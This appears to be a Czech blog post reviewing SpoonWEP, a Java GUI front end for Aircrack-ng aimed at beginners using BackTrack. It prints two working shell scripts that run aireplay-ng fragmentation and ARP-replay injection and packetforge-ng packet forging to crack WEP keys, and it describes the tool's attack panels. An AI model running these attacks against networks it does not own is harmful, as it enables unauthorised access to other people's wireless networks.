Nástroje na prolamování zabezpečení bezdrátových sítí, testování zranitelností a penetrační testy nezaznamenávají časté přírustky. O to větší nadšení zavládne v momentu kdy světlo světa spatří nějaká novinka nebo proof-of-concept. Dnes vám představíme jednoduchý grafický nástroj, kterého tvůrcem je autor nástroje Charon, o kterém se na airdump.cz psalo začátkem května. SpoonWEP je prográmek napsaný v Java a stejně jako Windows aplikace AiroWizard nebo již zmiňovaný Charon, jde „pouze“ o obal (nebo-li grafickou nástavbu) pro crackerský balík Aircrack-ng (airodump, aireplay, aircrack). Pouze jsem napsal záměrně, ano vím a fórum je toho důkazem, že i několik jednoduchých příkazů může uživately nadělat vítr. Tím se zároveň dostávame k tomu, že aplikace je primárně určena pro každého kdo dělá s penetrační distribuci Backtrack nebo WiFiSlax první kroky.
Celá aplikace je naprogramována, nebo spíše sestavena z několika jednoduchých skriptů, odsah frag.sh
APMAC=$1
CLIMAC=$2
CARD=$3
INJ=$4
ARP=“/tmp/arprequest“
sleep 2
cd /tmp
rm -f /tmp/*.cap;rm -f /tmp/*.xor;rm -f $ARP
aireplay-ng -F -x $INJ -m 144 -5 -b $APMAC -h $CLIMAC $CARD && xor=$(ls /tmp/*.xor)
packetforge-ng -0 -a $APMAC -h $CLIMAC -k 255.255.255.255 -l 255.255.255.255 -y $xor -w $ARP
aireplay-ng -F -x $INJ -2 -r $ARP -h $CLIMAC $CARD
..obsah souboru arp.sh
APMAC=$1
CLIMAC=$2
CARD=$3
INJ=$4
sleep 2
cd /tmp
rm -f /tmp/*.cap;rm -f /tmp/*.xor;
aireplay-ng -x $INJ -3 -b $APMAC -h $CLIMAC $CARD
..jako celek je ale spoonwep mocný nástroj, na kterém lze studovat proces automatizace. Dostupnost skriptů i pochopení základů pro psaní shell kódu. Pár screenshotů pro doplnění informací.
Konfigurační okno aplikace. Ze seznamu síťových karet vybart rozhraní bezdrátové karty které bude v aplikaci použita pro scan wifi sítí a injekci provozních dat. Třetí volba Mód je volitelná a lze ji změnit ještě v následujícím kroku.
Další panel slouží pouze k identifikaci bezdrátoví sítě a klienstkého zařízení.
Předposlední panel umožňuje zvolit jeden z útoků, možnost provést útok na WEP klíč v módu klient i v módu bez klientského zařízení.
Aplikace bude na požádaní přídána do české lokalizace live CD Backtrack mod. Pro stávající uživatele českého CD, DVD nebo USB je aplikace ke stažení v members area ve Fóru AirDump.cz (nutná registrace).
Kam dál?
- + Tutoriály Hacking
+ Nová česká verze BackTrack Linux 3.1 Final Cz DVD Mod
+ Lekce hackingu v Backtrack – Download
+ Hacking WiFi sítí 2011, Python, BackTrack, HASHe, Alfa atp
+ Jak na vlastní Hackerský video tutoriál
+ XSS Cross-Site Scripting XSS Me plugin Firefox
+ Windows WiFi hacking AirPcap Ext – mini recenze + fotografie
+ Klikací wifi hacking GUI – Ubuntu Lucid Lynx + Alfa AWUS050NH
+ Nessus – Exploit Rootkit scanner
+ Monitorujeme operační systém
+ AiroWizard – GUI nástroj pro WLAN hacking
+ Linksys E3000 2.4/5GHz – dvourádiové wifi Cisco na DD-WRT
+ Publikace Hacking Linksys WRT54G
+ Vydána verze Backtrack 3 Pre Final
+ Alternativa coWPAtty Plus a genPMK Plus – návod
+ L0phtCrack Windows & Linux cracker hesel – legenda se vrací
